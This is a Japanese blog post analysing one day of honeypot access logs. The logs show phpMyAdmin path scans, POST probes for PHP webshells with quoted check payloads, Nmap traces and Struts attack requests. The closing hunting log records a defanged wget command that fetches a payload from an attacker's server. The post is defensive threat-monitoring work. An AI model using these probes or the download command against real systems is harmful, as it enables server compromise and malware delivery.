S-Owl

S(ecurity)Owl

WOWHoneypotの簡易分析(41日目)

WOWhoneypotの2018/07/14(土) (運用41日目)の簡易分析です。
そろそろn日目の表記とか要らないのではと思い始めています。

本日の総アクセス件数は 310件です。
最近アクセスが少なかったので、どう育てるか考えていたんですが、まだ多い日もあってよかったです。
以下が全アクセスログです。

52 2018-07-14 GET /
14 2018-07-14 GET /index.action
4 2018-07-14 GET /www/phpMyAdmin/index.php
4 2018-07-14 GET /web/phpMyAdmin/index.php
4 2018-07-14 GET /tools/phpMyAdmin/index.php
4 2018-07-14 GET /pmd/index.php
4 2018-07-14 GET /pma-old/index.php
4 2018-07-14 GET /PMA/index.php
4 2018-07-14 GET /pma/index.php
4 2018-07-14 GET /PMA2/index.php
4 2018-07-14 GET /phpMyAdmin/phpMyAdmin/index.php
4 2018-07-14 GET /phpmyadmin/phpmyadmin/index.php
4 2018-07-14 GET /phpMyAdminold/index.php
4 2018-07-14 GET /phpMyAdmin.old/index.php
4 2018-07-14 GET /phpmyadmin-old/index.php
4 2018-07-14 GET /phpMyAdmin/index.php
4 2018-07-14 GET /phpmyadmin/index.php
4 2018-07-14 GET /phpMyadmin_bak/index.php
4 2018-07-14 GET /phpmyadmin2/index.php
4 2018-07-14 GET /phpmyadmin1/index.php
4 2018-07-14 GET /phpmyadmin0/index.php
4 2018-07-14 GET /phpma/index.php
4 2018-07-14 GET /phpadmin/index.php
4 2018-07-14 GET /mysqladmin/index.php
4 2018-07-14 GET /mysql-admin/index.php
4 2018-07-14 GET /myadmin/index.php
4 2018-07-14 GET /myadmin2/index.php
4 2018-07-14 GET /db/index.php
4 2018-07-14 GET /dbadmin/index.php
4 2018-07-14 GET /admin/PMA/index.php
4 2018-07-14 GET /admin/pma/index.php
4 2018-07-14 GET /admin/phpMyAdmin/index.php
4 2018-07-14 GET /admin/phpmyadmin/index.php
4 2018-07-14 GET /admin/phpmyadmin2/index.php
4 2018-07-14 GET /admin/mysql/index.php
4 2018-07-14 GET /admin/mysql2/index.php
4 2018-07-14 GET /admin/index.php
3 2018-07-14 POST /qq.php
3 2018-07-14 GET /.well-known/security.txt
3 2018-07-14 GET /sitemap.xml
3 2018-07-14 GET /robots.txt
3 2018-07-14 GET /pmamy/index.php
3 2018-07-14 GET /pmamy2/index.php
3 2018-07-14 GET /mysql/index.php
3 2018-07-14 GET /favicon.ico
2 2018-07-14 PROPFIND /
2 2018-07-14 POST /xx.php
2 2018-07-14 POST /xw.php
2 2018-07-14 POST /xw1.php
2 2018-07-14 POST /xshell.php
2 2018-07-14 POST /xiaoma.php
2 2018-07-14 POST /wuwu11.php
2 2018-07-14 POST /w.php
2 2018-07-14 POST /weixiao.php
2 2018-07-14 POST /wc.php
2 2018-07-14 POST /s.php
2 2018-07-14 POST /sheep.php
2 2018-07-14 POST /phpstudy.php
2 2018-07-14 POST /mx.php
2 2018-07-14 POST /lindex.php
2 2018-07-14 POST /feixiang.php
2 2018-07-14 POST /db_session.init.php
2 2018-07-14 POST /db.init.php
2 2018-07-14 POST /db__.init.php
2 2018-07-14 POST /conflg.php
2 2018-07-14 POST /ak47.php
2 2018-07-14 POST /9678.php
2 2018-07-14 GET /xampp/phpmyadmin/index.php
2 2018-07-14 GET /webdav/
2 2018-07-14 GET /typo3/phpmyadmin/index.php
2 2018-07-14 GET /manager/html
2 2018-07-14 GET /index.php
2 2018-07-14 GET /claroline/phpMyAdmin/index.php
1 2018-07-14 POST /yao.php
1 2018-07-14 POST /wshell.php
1 2018-07-14 POST /webslee.php
1 2018-07-14 POST /sdk
1 2018-07-14 POST /q.php
1 2018-07-14 POST /pe.php
1 2018-07-14 POST /log.php
1 2018-07-14 POST /hm.php
1 2018-07-14 POST /fack.php
1 2018-07-14 POST /defect.php
1 2018-07-14 POST /data.php
1 2018-07-14 POST /angge.php
1 2018-07-14 POST /8899.php
1 2018-07-14 POST /7788.php
1 2018-07-14 HEAD /robots.txt
1 2018-07-14 HEAD /
1 2018-07-14 GET /NmapUpperCheck1531569819
1 2018-07-14 GET /nmaplowercheck1531569819
1 2018-07-14 GET /Nmap/folder/check1531569819
1 2018-07-14 GET hxxp://114.215.207.183:83/index.php
1 2018-07-14 GET hxxp://112.124.127.162:83/index.php
1 2018-07-14 GET /HNAP1
1 2018-07-14 GET /evox/about
1 2018-07-14 GET /admin/assets/js/views/login.js

phpMyAdmin関連(159件)と/を除外したアクセス数です。

14 2018-07-14 GET /index.action
3 2018-07-14 POST /qq.php
3 2018-07-14 GET /.well-known/security.txt
3 2018-07-14 GET /sitemap.xml
3 2018-07-14 GET /robots.txt
3 2018-07-14 GET /favicon.ico
2 2018-07-14 POST /xx.php
2 2018-07-14 POST /xw.php
2 2018-07-14 POST /xw1.php
2 2018-07-14 POST /xshell.php
2 2018-07-14 POST /xiaoma.php
2 2018-07-14 POST /wuwu11.php
2 2018-07-14 POST /w.php
2 2018-07-14 POST /weixiao.php
2 2018-07-14 POST /wc.php
2 2018-07-14 POST /s.php
2 2018-07-14 POST /sheep.php
2 2018-07-14 POST /phpstudy.php
2 2018-07-14 POST /mx.php
2 2018-07-14 POST /lindex.php
2 2018-07-14 POST /feixiang.php
2 2018-07-14 POST /db_session.init.php
2 2018-07-14 POST /db.init.php
2 2018-07-14 POST /db__.init.php
2 2018-07-14 POST /conflg.php
2 2018-07-14 POST /ak47.php
2 2018-07-14 POST /9678.php
2 2018-07-14 GET /webdav/
2 2018-07-14 GET /manager/html
2 2018-07-14 GET /index.php
1 2018-07-14 POST /yao.php
1 2018-07-14 POST /wshell.php
1 2018-07-14 POST /webslee.php
1 2018-07-14 POST /sdk
1 2018-07-14 POST /q.php
1 2018-07-14 POST /pe.php
1 2018-07-14 POST /log.php
1 2018-07-14 POST /hm.php
1 2018-07-14 POST /fack.php
1 2018-07-14 POST /defect.php
1 2018-07-14 POST /data.php
1 2018-07-14 POST /angge.php
1 2018-07-14 POST /8899.php
1 2018-07-14 POST /7788.php
1 2018-07-14 HEAD /robots.txt
1 2018-07-14 GET /NmapUpperCheck1531569819
1 2018-07-14 GET /nmaplowercheck1531569819
1 2018-07-14 GET /Nmap/folder/check1531569819
1 2018-07-14 GET /HNAP1
1 2018-07-14 GET /evox/about
1 2018-07-14 GET /admin/assets/js/views/login.js

phpに対するPOSTは全部で58件です。攻撃は2IPから行われており、攻撃コードの中身を見ると、それぞれ以下のように分かれていました。

33件 cmd=die(md5('PHP'));
25件 cmd=die('Hello, Peppa!'.(string)(123456789*9))

それ以外のログを再度抽出します。

14 2018-07-14 GET /index.action
3 2018-07-14 GET /.well-known/security.txt
3 2018-07-14 GET /sitemap.xml
3 2018-07-14 GET /robots.txt
3 2018-07-14 GET /favicon.ico
2 2018-07-14 GET /webdav/
2 2018-07-14 GET /manager/html
1 2018-07-14 POST /sdk
1 2018-07-14 HEAD /robots.txt
1 2018-07-14 GET /NmapUpperCheck1531569819
1 2018-07-14 GET /nmaplowercheck1531569819
1 2018-07-14 GET /Nmap/folder/check1531569819
1 2018-07-14 GET /HNAP1
1 2018-07-14 GET /evox/about
1 2018-07-14 GET /admin/assets/js/views/login.js

このうち、nmapによるスキャンは以下です。
全てUser-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) と記載されているため判別可能です。

1 2018-07-14 POST /sdk
1 2018-07-14 GET /NmapUpperCheck1531569819
1 2018-07-14 GET /nmaplowercheck1531569819
1 2018-07-14 GET /Nmap/folder/check1531569819
1 2018-07-14 GET /HNAP1
1 2018-07-14 GET /evox/about

以下の残りのうち、Struts脆弱性をつく攻撃(GET /index.action)以外はほぼサイトの構成情報等を調査する行為かと思われます。

14 2018-07-14 GET /index.action
3 2018-07-14 GET /robots.txt
3 2018-07-14 GET /sitemap.xml
3 2018-07-14 GET /.well-known/security.txt
3 2018-07-14 GET /favicon.ico
2 2018-07-14 GET /webdav/
2 2018-07-14 GET /manager/html
1 2018-07-14 HEAD /robots.txt
1 2018-07-14 GET /admin/assets/js/views/login.js

 この中出見覚えがないのは、以下です。

1 2018-07-14 GET /admin/assets/js/views/login.js

どうやらこのパスはFreepbxというものに存在するようです。どんな脆弱性があるのかまでは不明でした。アクセスログは一般的なものだった為、恐らくは存在するかの調査行為と思われます。同一IPからの他のアクセスもありませんでした。

 

本日のハンティングログは以下です。Struts脆弱性を突くもので検知しています。

1 2018-07-14 wget hxxp://222.186.153[.]142:26591/nodebase

以上です。